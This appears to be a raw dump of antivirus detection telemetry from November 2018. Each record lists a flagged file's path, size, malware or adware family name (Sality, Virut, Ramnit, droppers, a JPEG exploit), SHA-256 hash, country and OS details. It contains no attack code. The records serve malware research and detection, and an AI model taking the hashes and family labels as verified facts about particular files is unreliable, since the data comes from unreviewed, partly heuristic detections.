  Row(detection=Row(filename='pmc01000.exe', filepath='C:\\NOVA PASTA\\MCPED10\\PMC01000.EXE', filesize=8192000, name='W32/Sality.AT.#M1.#R1'), hash='380182af6edc88fb2739fc56adc81b54ee8cc5c35c623785e12f6816c076014f', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:36:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='\\\\?\\c:\\windows\\system32\\maintenancesservices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:26:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='018443b7f79d669be1c20a5e6850edeb888caf5b764b75ecf501faba60700516', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-34\\018443B7F79D669BE1C20A5E6850EDEB888CAF5B764B75ECF501FABA60700516', filesize=1856000, name='TR/Crypt.XPACK.Gen7.#M300.#R601541'), hash='018443b7f79d669be1c20a5e6850edeb888caf5b764b75ecf501faba60700516', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:30:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='ae6c89ba33fb3fb7c0ecffcde0ffdc3501b4fe3d405f1d1fef94c6c9b4aa7627', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=428032, timestamp='2018-11-01T11:34:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-131325-b4e66ae9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a40b8d7b\\AVSCAN-20181101-130252-37FDA486\\AVSCAN-20181101-131325-B4E66AE9', filesize=5444000, name='PUA/Systweak.#M1.#R1'), hash='c8f28ea521eb29b88e8279c4e7b5df617cf50c64764bde1a443883b3a13046be', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:13:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='e6d31891aa6c0f3a50dc846868150fdf31695add2afa9b9e0621111b4f284a6e', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-18\\E6D31891AA6C0F3A50DC846868150FDF31695ADD2AFA9B9E0621111B4F284A6E', filesize=1856000, name='HEUR/AGEN.1029502.#M1.#R1'), hash='e6d31891aa6c0f3a50dc846868150fdf31695add2afa9b9e0621111b4f284a6e', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:28:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='custo.exe', filepath='G:\\deezer\\custo.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='e9238eb4cc2a0e45a4ecca77c7477cc3a19b6954cc0ca545537f1325ece125fc', metadata=Row(cmdline=None, country='CI', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Windows\\explorer.exe', parentsize=2106176, timestamp='2018-11-01T11:50:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='apxkxtyquoc.dll', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\nsl37E4.tmp\\apXKXtYQUOC.dll', filesize=1152000, name='Adware/Zdengo.jplev.#M1.#R1'), hash='abd0bce4329be3cb4cdd15f863c7d30f3477d1f45065c27c9384482a6ae87134', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:33:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-124343-e70d2e19', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-124323-D568208F\\AVSCAN-20181101-124343-E70D2E19', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:43:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111317-0c1c58d5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-111317-0C1C58D5', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:13:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-123126-71d2531b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-123105-5F8692CC\\AVSCAN-20181101-123126-71D2531B', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:31:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='eb64c005f597654677fe378d8ffff30c3912e5887668d03acccb84c94ba7929e', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T11:30:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110525-5aad2fad', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-110414-5136BFFA\\AVSCAN-20181101-110525-5AAD2FAD', filesize=2816000, name='TR/Crypt.CFI.Gen.#M1.#R1'), hash='d4c8083f289e16a5c13992bc54862e71bbc132c3f3a0ddc6e4c4741c531ad963', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T03:05:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wmlaunch.exe', filepath='C:\\Program Files\\Windows Media Player\\wmlaunch.exe', filesize=256000, name='W32/Virut.Gen.#M1.#R1'), hash='ee0260544e952c11244cba40bb0b9cd684da26aee741eb4805841c5770f9acb5', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\UCBrowser\\Application\\UCBrowser.exe', parentsize=1225616, timestamp='2018-11-01T09:45:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='umount.exe', filepath='\\\\?\\C:\\Windows\\winsxs\\x86_microsoft-windows-nfs-clientcmdtools_31bf3856ad364e35_6.1.7600.16385_none_5139b94651c5c307\\umount.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='7e2b2a8c6b77bd63ebc8bc619d700342891c096c16ea6610e371e073307dc7bf', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:25:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='epson321833eu.exe', filepath='D:\\c\\Mes documents\\downloads\\Programs\\epson321833eu.exe', filesize=13376000, name='W32/Sality.AG.#M1.#R1'), hash='a8fe30c84e9ac4cc4577ef29103bb69db4e3cf4245388b295b09f69d89574c45', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe2_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe2 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T11:52:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='f15625248.dll', filepath='H:\\Downloads\\testdisk-7.0.win64\\testdisk-7.0\\recup_dir.9\\recup_dir.1\\recup_dir.60\\f15625248.dll', filesize=768000, name='PUA/OpenCandy.Gen.#M300.#R6753'), hash='9449b4422f2efed8894252b78b9412536f41285f229bdbfc3825114b84764907', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-01T08:08:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='freevideodub-downloader.exe', filepath='F:\\Netbook\\LW_C\\Dokumente und Einstellungen\\Walter Schmitz\\Eigene Dateien\\FreeVideoDub-Downloader.exe', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='a991124ffdc61b97ef1548bab089a7c63a32316067441dda960b67ab61acaa4a', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\totalcmd_912\\TOTALCMD64.EXE', parentsize=8870024, timestamp='2018-11-01T01:24:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='application.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Application.exe', filesize=832000, name='HEUR/AGEN.1028207.#M1.#R1'), hash='96344dbc8ec4db313207634d43a057e17a3a15700ce61540ca461499c3e7b006', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\CSI SAP2000 v18.1.1 Final  [x32 + x64] + Crack\\CSI SAP2000 v18.1.1 64bit\\install\\SAP2000v1811Setup64.exe', parentsize=471740928, timestamp='2018-11-01T20:56:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-195753-7db6b31c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ec475906\\AVSCAN-20181101-195713-7981BBCD\\AVSCAN-20181101-195753-7DB6B31C', filesize=448000, name='X2000M/Laroux.FO.#M1.#R1'), hash='d77a7e6233100169ef698cd15376e94a8b70a2e8ad013b22308124f6c3a6d201', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T12:57:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mpuxsrv.exe', filepath='C:\\Program Files\\Windows Defender\\MpUXSrv.exe', filesize=320000, name='W32/Infector.Gen8.#M300.#R700734'), hash='bfadcb99e116ad6c9a6280aedd9a7c8bb796116a6f14dd90cabab47dec24821c', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:LOLCT7hy8UO288CC.1', country='MY', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T04:22:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='winsat.exe', filepath='\\\\?\\C:\\Windows\\system32\\WINSAT.EXE', filesize=3392000, name='W32/Virut.Gen.#M1.#R1'), hash='dab470963f99e52acae5be422ee4aaf8c9b8495c4a8b1c32cf0c44ee42fe3a37', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:24:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='updater_zip_res0301_newmm[6].exe', filepath='\\\\?\\C:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\Updater_zip_res0301_newmm[6].exe', filesize=10368000, name='ADWARE/ELEX.Gen.#M300.#R7708'), hash='f062a67cda8a7166a774b121aaaed4283fc49b671084b55745a7262df0b7b65e', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:25:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='футболки кофе.pif', filepath='D:\\Tolya\\Футболки кофе\\Футболки кофе.pif', filesize=512000, name='TR/Chydo.TF.#M1.#R1'), hash='e3460c24a1aa8b9a9694490074b672fd95f10e62f5467b2503cfb7fcd43e73da', metadata=Row(cmdline=None, country='KZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:17:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-140627-69a20966', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0286de76\\AVSCAN-20181101-140442-574AB5C5\\AVSCAN-20181101-140627-69A20966', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T13:06:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T06:42:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ac874b3f-7de2-cc6b-0d9a-2516538d86b0.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2017-11-20_08-39-44\\ac874b3f-7de2-cc6b-0d9a-2516538d86b0.exe', filesize=256000, name='TR/Dropper.Gen.#M300.#R4148'), hash='1ec36fc1bb6bce36dd3a82304be237919ede3e6b790b7a248c340042353b5bc0', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=4673304, timestamp='2018-11-01T03:46:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-173553-b8bf4548', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0219e0d6\\AVSCAN-20181101-160503-1618A0E9\\AVSCAN-20181101-173553-B8BF4548', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='GE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:35:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T06:00:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='\\\\?\\C:\\Windows\\system32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='085f747d9c5a2e04a7b8c1ff35b643602e6313c16bf4c2d157b3997086c06869', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:34:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xerces-c_1_6_0.dll', filepath='D:\\AutoCAD2009\\x86\\xerces-c_1_6_0.dll', filesize=1536000, name='W32/Ramnit.A.#M1.#R1'), hash='44d73b70f5bc66adb08c739dd549e80534b79cc3b6a7507b3aea447f58425db0', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:38:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-163108-89ed817a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_db3835ad\\AVSCAN-20181101-163021-8345FBF2\\AVSCAN-20181101-163108-89ED817A', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T15:31:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dealplylive.exe', filepath='\\\\?\\C:\\Program Files (x86)\\DealPlyLive\\Update\\DealPlyLive.exe', filesize=148000, name='ADWARE/DealPly.Gen4.#M300.#R300171'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T19:31:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-171155-990f48c0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_29234407\\AVSCAN-20181101-171136-96B7A631\\AVSCAN-20181101-171155-990F48C0', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T16:11:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-002817-5e3720c8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-001743-196A0AE8\\AVSCAN-20181102-002817-5E3720C8', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:28:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='607b0b1b2e7b48906df1d49f2b028a16f6354117b0d801d2554a681ba41138c7.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-14.available\\Avira\\607B0B1B2E7B48906DF1D49F2B028A16F6354117B0D801D2554A681BA41138C7.VIR', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='607b0b1b2e7b48906df1d49f2b028a16f6354117b0d801d2554a681ba41138c7', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T08:13:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-083018-827e9298', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_07863e8e\\AVSCAN-20181101-082637-63AB43C4\\AVSCAN-20181101-083018-827E9298', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T07:30:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='07627a127d0ba42a3ba146b277903b30406c18e51267dc3d991e8ee9864b854f', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_30.10.2018-20.categorizing\\07627A127D0BA42A3BA146B277903B30406C18E51267DC3D991E8EE9864B854F', filesize=184000, name='TR/Dldr.Agent.184000.#M1.#R1'), hash='07627a127d0ba42a3ba146b277903b30406c18e51267dc3d991e8ee9864b854f', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-01T07:04:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.691\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.691\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T17:36:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-002358-4228e11a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-001743-196A0AE8\\AVSCAN-20181102-002358-4228E11A', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:24:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T03:23:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-002146-33d6b621', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-002012-29AB3F0F\\AVSCAN-20181102-002146-33D6B621', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:21:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-135727-96b042d1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ed574763\\AVSCAN-20181101-135713-9543D436\\AVSCAN-20181101-135727-96B042D1', filesize=1600000, name='Adware/DealPly.bqeij.#M1.#R1'), hash='1623129501d3a77f371635e57f9f599b6a3d3d202427c7d5a95ca710d9f22f8b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T12:57:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-193659-54497729', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9b59c424\\AVSCAN-20181101-193643-51017E8B\\AVSCAN-20181101-193659-54497729', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:36:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-140251-5250b683', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-140155-4A2FA7D7\\AVSCAN-20181101-140251-5250B683', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T13:02:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-183733-95f3a222', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e458018\\AVSCAN-20181101-183714-933F3F21\\AVSCAN-20181101-183733-95F3A222', filesize=6912000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='3653e9e72fc173af5e91eef09296aa98faa7c71a1849c98650fce1ba7c036289', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:37:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='45af74e0ae4dacfa58f8fa193ab0d91bde12562775fe6d678ebe46b5538ae494', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\45AF74E0AE4DACFA58F8FA193AB0D91BDE12562775FE6D678EBE46B5538AE494', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='45af74e0ae4dacfa58f8fa193ab0d91bde12562775fe6d678ebe46b5538ae494', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:24:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\wfnumjf3ydx\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='ZW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-01T08:34:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='aa80ede70a3ef77838e1e211d7a29b079ad250ac68092d5ede1287c084c8422d', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-17\\AA80EDE70A3EF77838E1E211D7A29B079AD250AC68092D5EDE1287C084C8422D', filesize=1408000, name='TR/Crypt.XPACK.Gen7.#M300.#R601544'), hash='aa80ede70a3ef77838e1e211d7a29b079ad250ac68092d5ede1287c084c8422d', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:16:17Z'), dt=datetime.date(2018, 11, 1)),
